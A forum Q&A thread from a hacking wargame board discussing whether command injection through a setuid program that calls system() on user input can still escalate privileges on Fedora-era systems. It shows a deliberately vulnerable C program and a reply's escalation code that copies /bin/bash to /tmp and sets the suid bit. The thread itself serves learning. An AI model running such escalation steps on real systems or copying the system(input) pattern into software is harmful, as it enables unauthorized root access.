Level Hacking

   kumi123
   http://blog.naver.com/kumik12
   So, on Fedora and later, is a bypass using ( ; , | ) impossible?

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3315


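When the suid bit is set,

and the program takes input characters and runs them through the system function,

on Red Hat 9 and below there is no privilege-drop problem, so it doesn't matter, but

on Fedora and later the system function drops privileges, so

in the end the ; , | detour can't be used..

Is there some idea for getting around this?

-------------

For example,

#include <stdio.h>
#include <stdlib.h>

int main()
{
char buf[20];
fgets(buf, sizeof buf, stdin); /* bounded read; gets() is gone from current C */
system(buf);                   /* the input is run through /bin/sh -c */
return 0;
}

./a
/bin/sh
id (an idea for getting raised privileges when this is entered)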

  Hit : 2241     Date : 2014/02/03 03:49



    
cd80 If you mean something like system(argv[1]);
you can just give /bin/sh the -p option~
2014/02/04  
kumi123 I wrote the program the way I added above and then gave /bin/sh the -p option.. and the euid doesn't change. T_T

Since the system function works only after it has already dropped privileges internally, -p seems to be useless T_T

It seems to work like this.. T_T
2014/02/04  
kumi123 With the execl function, the euid is picked up right away T_T.

In that situation, is the bypass now blocked?
2014/02/04  
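cd80 Uh.. if it's an environment where you can create programs,
#include <stdlib.h>
#include <unistd.h>

int main(void){
/* set the real and effective uid to the current effective uid */
setreuid(geteuid(), geteuid());
system("cp /bin/bash /tmp/bash");
system("chmod +s /tmp/bash");
return 0;
}
write that, then have system() run that program, and
try running /tmp/bash -p, I think that would work
Or maybe this doesn't work either..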
2014/02/04  
kumi123 It doesn't work..

Privilege drop before the system function runs -> privilege raise with setreuid (the same in the end) -> file created (user id)

So in the end it's impossible.. as long as setuid() can't be applied before the system function,

However, if it's a remote attack (web hacking), I think it would be possible.
2014/02/05  
cd80 Oh, you're right haha
2014/02/05